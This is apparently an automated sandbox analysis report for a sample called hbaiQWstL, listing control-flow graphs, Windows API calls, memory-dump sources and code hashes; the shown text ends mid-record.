                control_flow_graph 44 185b299-185b2b7 45 185b2e3-185b2e7 44->45 46 185b2b9-185b2c6 call 185af38 44->46 48 185b2e9-185b2f3 45->48 49 185b2fb-185b33c 45->49 53 185b2dc 46->53 54 185b2c8 46->54 48->49 55 185b33e-185b346 49->55 56 185b349-185b357 49->56 53->45 99 185b2ce call 185b540 54->99 100 185b2ce call 185b532 54->100 55->56 57 185b359-185b35e 56->57 58 185b37b-185b37d 56->58 60 185b360-185b367 call 185af44 57->60 61 185b369 57->61 63 185b380-185b387 58->63 59 185b2d4-185b2d6 59->53 62 185b418-185b4d8 59->62 65 185b36b-185b379 60->65 61->65 94 185b4e0-185b50b GetModuleHandleW 62->94 95 185b4da-185b4dd 62->95 66 185b394-185b39b 63->66 67 185b389-185b391 63->67 65->63 68 185b39d-185b3a5 66->68 69 185b3a8-185b3b1 call 185af54 66->69 67->66 68->69 75 185b3b3-185b3bb 69->75 76 185b3be-185b3c3 69->76 75->76 77 185b3c5-185b3cc 76->77 78 185b3e1-185b3ee 76->78 77->78 80 185b3ce-185b3de call 185af64 call 185af74 77->80 84 185b411-185b417 78->84 85 185b3f0-185b40e 78->85 80->78 85->84 96 185b514-185b528 94->96 97 185b50d-185b513 94->97 95->94 97->96 99->59 100->59
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B4FE
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: fbaf42d54cd2e6252c024a667110a47adb7f04d5e483b60090eb13925be21084
                • Instruction ID: 048908d54dcd341777b2874136fa590be62c6e2875f96ef6367b5cab47a0a1a6
                • Opcode Fuzzy Hash: fbaf42d54cd2e6252c024a667110a47adb7f04d5e483b60090eb13925be21084
                • Instruction Fuzzy Hash: 59815770A00B058FE764DF29D48479ABBF2FF88304F108A2DD84ADBA51DB75E945CB91

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 101 18544e0-18559d9 CreateActCtxA 104 18559e2-1855a3c 101->104 105 18559db-18559e1 101->105 112 1855a3e-1855a41 104->112 113 1855a4b-1855a4f 104->113 105->104 112->113 114 1855a51-1855a5d 113->114 115 1855a60 113->115 114->115 117 1855a61 115->117 117->117
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 018559C9
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 04db838b3d12f1a307dfa7577a80079e485bab7c5defd8ad8a22541841ff9d96
                • Instruction ID: 7e7aa0d6f68f004c94baafadf44256fa69bb19d43446e7a500efad97f60b452c
                • Opcode Fuzzy Hash: 04db838b3d12f1a307dfa7577a80079e485bab7c5defd8ad8a22541841ff9d96
                • Instruction Fuzzy Hash: 4241E070C0071DCBDB24DFA9C884B8EBBB5FF88704F20806AD408AB251DB756A49CF90

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 118 185590c-18559d9 CreateActCtxA 120 18559e2-1855a3c 118->120 121 18559db-18559e1 118->121 128 1855a3e-1855a41 120->128 129 1855a4b-1855a4f 120->129 121->120 128->129 130 1855a51-1855a5d 129->130 131 1855a60 129->131 130->131 133 1855a61 131->133 133->133
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 018559C9
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 5bb5388cfd78bca7b6dd23a624f8ee1119bbb6ffad4cd3c738e5cde53b795fd7
                • Instruction ID: b9559251580e02999128aecd9868d63431892718b0eeea6f8efc430ddb92eacf
                • Opcode Fuzzy Hash: 5bb5388cfd78bca7b6dd23a624f8ee1119bbb6ffad4cd3c738e5cde53b795fd7
                • Instruction Fuzzy Hash: A641CF70C00719CFDB25DFA9C984BDEBBB2BF88714F20816AD418AB251DB75694ACF50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 134 185d788-185d81c DuplicateHandle 135 185d825-185d842 134->135 136 185d81e-185d824 134->136 136->135
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185D80F
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 04afeb18131d7ac03ca0bbaa2bb7a3c4bb93c55fabd5add42c499a53e90d9444
                • Instruction ID: 6c98b1b921ccdf3a1e530a7c57c5d9fcadd423eedad8914f5e4cbc0823b3d5ba
                • Opcode Fuzzy Hash: 04afeb18131d7ac03ca0bbaa2bb7a3c4bb93c55fabd5add42c499a53e90d9444
                • Instruction Fuzzy Hash: F121E4B5900249DFDB10CF9AD984ADEBFF4FB48324F14841AE918A3310D379A954CFA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 139 185d780-185d81c DuplicateHandle 140 185d825-185d842 139->140 141 185d81e-185d824 139->141 141->140
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185D80F
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: e4261cf0f354ed33adea1a260803c43c23bb47f3dfb11d6c1b37fe446827a846
                • Instruction ID: f1e4bc7e32da14e5ee925b978d16472aacde28392f284ec325a04fc177cf34f2
                • Opcode Fuzzy Hash: e4261cf0f354ed33adea1a260803c43c23bb47f3dfb11d6c1b37fe446827a846
                • Instruction Fuzzy Hash: 03210EB5C00248DFDB10CFA9D984ADEBBF4FB08324F14841AE918A3250D378AA54CF61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 144 af102b8-af1032a PostMessageW 146 af10333-af10347 144->146 147 af1032c-af10332 144->147 147->146
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 0AF1031D
                Memory Dump Source
                • Source File: 0000000A.00000002.2334366563.000000000AF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_af10000_hbaiQWstL.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 5709f3c777872924a6c163686151df203ceb2cc461be369e7172b10ec7dfa233
                • Instruction ID: 4df73d441b10d22a3cacd25b2fddc78938b40d4b1f950493a646039dc1d8ee42
                • Opcode Fuzzy Hash: 5709f3c777872924a6c163686151df203ceb2cc461be369e7172b10ec7dfa233
                • Instruction Fuzzy Hash: B21128B58003499FDB10DF9AD584BDEFFF8EB48324F14841AD559A7600C775A584CFA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 149 185b498-185b4d8 150 185b4e0-185b50b GetModuleHandleW 149->150 151 185b4da-185b4dd 149->151 152 185b514-185b528 150->152 153 185b50d-185b513 150->153 151->150 153->152
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B4FE
                Memory Dump Source
                • Source File: 0000000A.00000002.2305470591.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_1850000_hbaiQWstL.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 2cc6d197391f22def3a91eade8b35c8c7c03c9dba3c7903668fe4d19c7a4b376
                • Instruction ID: a9795facf16ded9f1a283931b2d4e84ccfa848fddf35accc76186f7696f63340
                • Opcode Fuzzy Hash: 2cc6d197391f22def3a91eade8b35c8c7c03c9dba3c7903668fe4d19c7a4b376
                • Instruction Fuzzy Hash: 9B11D2B5C006498FDB14CF9AC444A9EFBF5EB88328F14841AD919A7610D379A645CFA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 155 af102c0-af1032a PostMessageW 156 af10333-af10347 155->156 157 af1032c-af10332 155->157 157->156
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 0AF1031D
                Memory Dump Source
                • Source File: 0000000A.00000002.2334366563.000000000AF10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_af10000_hbaiQWstL.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 2aa5d1ffeecc9f41758d24c07e61e738521921f2d713d540a6dda331286521f6
                • Instruction ID: 290097e613273584067b109d4f3c552f77f9a17235b21bd29c0034481c9e2764
                • Opcode Fuzzy Hash: 2aa5d1ffeecc9f41758d24c07e61e738521921f2d713d540a6dda331286521f6
                • Instruction Fuzzy Hash: FA1103B58003499FDB10DF9AC884BDEBBF8EB48324F10841AD519A7600C379A544CFA1
                Memory Dump Source
                • Source File: 0000000A.00000002.2277242611.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17bd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24d5b7b7a5efd22c716741d8babd4e91f41d2226b9d8c291cb31eaeddccd29b9
                • Instruction ID: 9856264f62477b26e820410fa0c01db522e24f458ac11f08bc0406a0954faa6b
                • Opcode Fuzzy Hash: 24d5b7b7a5efd22c716741d8babd4e91f41d2226b9d8c291cb31eaeddccd29b9
                • Instruction Fuzzy Hash: E52148B2100204DFDB25DF84D9C0BA6FF65FB84328F20C5ACED090B256C33AE456CAA1
                Memory Dump Source
                • Source File: 0000000A.00000002.2277242611.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17bd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: acc5fdfaa5821fd95cfee14628bbcfcb14abd3f2ad94b5dee931556ec78306ef
                • Instruction ID: 941890491872b4f212350f3bfd0edb11154dbe2daa9c684edd15180b4809b409
                • Opcode Fuzzy Hash: acc5fdfaa5821fd95cfee14628bbcfcb14abd3f2ad94b5dee931556ec78306ef
                • Instruction Fuzzy Hash: FE21F1B2504244EFDB25DF54D9C0B66FF65FB8831CF3085A9E9090A256C33AD456CAA1
                Memory Dump Source
                • Source File: 0000000A.00000002.2285648267.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17cd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 18e0af3eb7c27f067ddbf116fe83d0afe7ce132bcd5b88a392745f2cf4619d2c
                • Instruction ID: 8dc14ece6d7554e193acd64ff23e2e42d3647465bc60f10671f24bf15a1bb323
                • Opcode Fuzzy Hash: 18e0af3eb7c27f067ddbf116fe83d0afe7ce132bcd5b88a392745f2cf4619d2c
                • Instruction Fuzzy Hash: BA212275604204EFDB25DF58D9C0B26FBA1FB88B14F20C5BDD90A0B252C37AD487CAA1
                Memory Dump Source
                • Source File: 0000000A.00000002.2285648267.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17cd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ec78083eeea796dd5fc7b9a3529e9f57a99323bcd48f678c0451a1dd5c492c2
                • Instruction ID: f323d0ca8d006d9412de274c84498559b05e202898a6ff9e77b7500cfdd34c40
                • Opcode Fuzzy Hash: 6ec78083eeea796dd5fc7b9a3529e9f57a99323bcd48f678c0451a1dd5c492c2
                • Instruction Fuzzy Hash: B62137B1508200EFDB25DF94D9C0B26FB62FB84B24F20C5BDD9094B252C376D406CBA1
                Memory Dump Source
                • Source File: 0000000A.00000002.2277242611.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17bd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction ID: 0adfeaa3251f90d2f8fd2aff007a5465033a7f400ca16ab5fd753b531799b221
                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction Fuzzy Hash: 5511DF76404280CFCB12CF54D5C4B56FF72FB84318F24C6A9D8090B256C33AD456CBA1
                Memory Dump Source
                • Source File: 0000000A.00000002.2277242611.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17bd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction ID: 27f078660c908bcc5e273c427aace3e683adb63af1659a9644de68971e1a0535
                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction Fuzzy Hash: AF11C076404240CFCB12CF44D5C4B96BF61FB84314F2486A9DC090A256C33AD456CB91
                Memory Dump Source
                • Source File: 0000000A.00000002.2285648267.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17cd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction ID: 463d14b884c9b013ee1016cbdeead717b604c64acff230740495fde6e115d0b8
                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction Fuzzy Hash: 3D11BE76508280DFCB12CF54C5C0B15FB62FB84724F24C6ADD8494B256C33AD40ACB91
                Memory Dump Source
                • Source File: 0000000A.00000002.2285648267.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_17cd000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction ID: 2a67b1dd5a875b21360f959052db8bac78ae9ed31618f979ddc333db749a4ad7
                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction Fuzzy Hash: 8B11DD75504284DFCB22CF58D5C4B15FFA2FB88714F24C6AED8494B656C33AD44ACBA2

                Execution Graph

                Execution Coverage:0.1%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:5
                Total number of Limit Nodes:1
                Execution graph rendered as image (node listing omitted): nodes at 17f2df0, 17f2c00, 17f2c0a, 17f2c1f and 17f2c11; the nodes at 17f2df0 and 17f2c1f call LdrInitializeThunk

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 17f2c0a, calls LdrInitializeThunk
                APIs
                • LdrInitializeThunk.NTDLL(0180FD4F,000000FF,00000024,018A6634,00000004,00000000,?,-00000018,7D810F61,?,?,017C8B12,?,?,?,?), ref: 017F2C24
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: bf9341db8686d92d3190550deda9752700a505a7d4c9843f1b856b5a91ab81f4
                • Instruction ID: 6fc36a2bfa57b6d0c87fb2fe631eb7fce62fe651ea548c9865e3a5ef89b8066a
                • Opcode Fuzzy Hash: bf9341db8686d92d3190550deda9752700a505a7d4c9843f1b856b5a91ab81f4
                • Instruction Fuzzy Hash: EEB09B71D019C5C9DB52E7644A087177900B7D1711F15C065D3034695F8738C1D5E276

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 17f2df0, calls LdrInitializeThunk
                APIs
                • LdrInitializeThunk.NTDLL(0182E73E,0000005A,0188D040,00000020,00000000,0188D040,00000080,01814A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,017FAE00), ref: 017F2DFA
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d46f43e03a073fb2ee82efc7326a08d2d686db0013c2351aa62c840a252b3103
                • Instruction ID: 1dea0d6e83d09e767c2ca66a0fb2ec03541f0e37fd4a3220214cd6349363efb7
                • Opcode Fuzzy Hash: d46f43e03a073fb2ee82efc7326a08d2d686db0013c2351aa62c840a252b3103
                • Instruction Fuzzy Hash: 8290023160180857D15271584904707000997D1341F95C412A142859CDD6568BD6A222

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 17f35c0, calls LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001800000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001806000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001842000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A3000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.00000000018A9000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_1780000_hbaiQWstL.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a3fa59dd017ac628186501af29686a076fbdcb0d4130c5ece3e87d5c01fc5d26
                • Instruction ID: 751d752ae877c753cd6593c60e76bd20503a963e39bb696491df726c41a16d66
                • Opcode Fuzzy Hash: a3fa59dd017ac628186501af29686a076fbdcb0d4130c5ece3e87d5c01fc5d26
                • Instruction Fuzzy Hash: EC900231A0590846D14171584914706100597D1301F65C411A14285ACDC7958BD566A3

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42d000, calls subroutines at 42e683 and 42e633
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 38d3599b24e04c04455723bad7906fc3437ea9deb6112700fda80e06c56e1c08
                • Instruction ID: e1bad01d78eea3593c0e48f5639def0373a07c299f4d63162d710884237cd9e6
                • Opcode Fuzzy Hash: 38d3599b24e04c04455723bad7906fc3437ea9deb6112700fda80e06c56e1c08
                • Instruction Fuzzy Hash: 90110672B406156BD324DF55DC82FFBB379DF84314F54054EFA088A181EA74AA4287D8

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42e1e0, calls subroutine at 42e6d3
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2ceae1a592c5aa9c24b884000b4813f64f69adc33d5eca27968a78ae953d0f99
                • Instruction ID: 14b503e4b4dbf4a94af14bba9f0082b6c658a07d39a71e0c42bec1849d99252b
                • Opcode Fuzzy Hash: 2ceae1a592c5aa9c24b884000b4813f64f69adc33d5eca27968a78ae953d0f99
                • Instruction Fuzzy Hash: 13015671D1032C56EB60FBA9AD42FD973B89B04304F4046DAB50CA6181FE74578CCF65

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42e1e3, calls subroutine at 42e6d3
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e08184f4ac4478ee332d2b1b8cca028d09cfda6cc3f20e5c521ef6c3af75e5a
                • Instruction ID: 127a4dcd22573884f948fd3c56ad155cbe9f07fd1aa0e13e2caf42441fe7631d
                • Opcode Fuzzy Hash: 1e08184f4ac4478ee332d2b1b8cca028d09cfda6cc3f20e5c521ef6c3af75e5a
                • Instruction Fuzzy Hash: 32015671D1032C56EB60FB999D42FD973B85B04304F4046DAB50CA6181EE74578CCF65

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42e594, no calls
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1cf5ac5d07dc1adbc98e8feca5841ebe62ac76af760b6f22fcdd76b91af82424
                • Instruction ID: 468f0cba1bd46181291fbb9e0a631c89db09a513db55b99bad26aa58490c7061
                • Opcode Fuzzy Hash: 1cf5ac5d07dc1adbc98e8feca5841ebe62ac76af760b6f22fcdd76b91af82424
                • Instruction Fuzzy Hash: 31F01D76650209AFDB05CF55C881EEA77A9FF48310F08815DBC19CB642D778E511CBA4

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42e285, no calls
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 620ea372d248d728081e89d8926d310f7674273f533dfcbe022cd2c2fdb62263
                • Instruction ID: 072733a89d86e1a20b37d7505ec4f0c36fdef33088d4e3396a9911416279adb3
                • Opcode Fuzzy Hash: 620ea372d248d728081e89d8926d310f7674273f533dfcbe022cd2c2fdb62263
                • Instruction Fuzzy Hash: 87F0BEB1E042685ADB60FBBA6C42BCE73689B04304F8445EAA50C92142EE3593488FA5

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42e70e, calls subroutine at 42e6d3
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9b42d2634786242032c3cf20feeb3c5066281e123e526e87d56df8cf085e9bf0
                • Instruction ID: 53dceb39008c6f3320527b65ad23dff012749cc1a53a0a99b2c7f032207c0014
                • Opcode Fuzzy Hash: 9b42d2634786242032c3cf20feeb3c5066281e123e526e87d56df8cf085e9bf0
                • Instruction Fuzzy Hash: 88E04F76B5122137D2205686AD4AFAB676DDBC1B61F4D406AFA0CAB340D5B9D90082E8

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42e713, calls subroutine at 42e6d3
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df7bdc3ff78b4769467c641f53c7827f03c54f833d97224b3cb83331040601f0
                • Instruction ID: 86721405b170526936520b2b9391d4bcfdc03a2d3689df5cdf7690ad457e8398
                • Opcode Fuzzy Hash: df7bdc3ff78b4769467c641f53c7827f03c54f833d97224b3cb83331040601f0
                • Instruction Fuzzy Hash: F2E04876B5022527D120558A6C06F57776C9BC1B60F494066FE0897341D564A90042E8

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42e5a3, no calls
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c1b9c3e4399eeba896e68a3f01f5d1adf480529a36e0dcae03ff96d9b24bc08
                • Instruction ID: dbe7326b6ecce26b87581471b72b6081cb43ca52ac60e9199f22fd608944d5c9
                • Opcode Fuzzy Hash: 1c1b9c3e4399eeba896e68a3f01f5d1adf480529a36e0dcae03ff96d9b24bc08
                • Instruction Fuzzy Hash: 1EF01C72610209AFCB04CF59C881EEB73ADFB88750F04C129FD198B241D774EA10CBA0

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 42e633, no calls
                Memory Dump Source
                • Source File: 0000000E.00000002.2428432574.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_42d000_hbaiQWstL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6b7e1aa61001c2ad38e821b6909e094e9abcd2cfa45b901712d81ed3a5f18643
                • Instruction ID: bbb5f8cb07a0670ae8a8f12577331f64d48d0a93c97cfbbb82a283717230bf09
                • Opcode Fuzzy Hash: 6b7e1aa61001c2ad38e821b6909e094e9abcd2cfa45b901712d81ed3a5f18643
                • Instruction Fuzzy Hash: CAC080B16103087FD700EBCCDC46F6533DC970C610F408055B90C9B342D5B4F9108754

                Control-flow Graph

                Control-flow graph rendered as image (node listing omitted): function at 17f4a80, calls RtlDebugPrintTimes and subroutines at 17df5a0 and 17e1e46
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.2428926409.00000000017A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                • Associated: 0000000E.00000002.2428926409.0000000001780000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 0000000E.00000002.2428926409.0000000001787000.00000040.00001000.00020000.00000000.sdmp
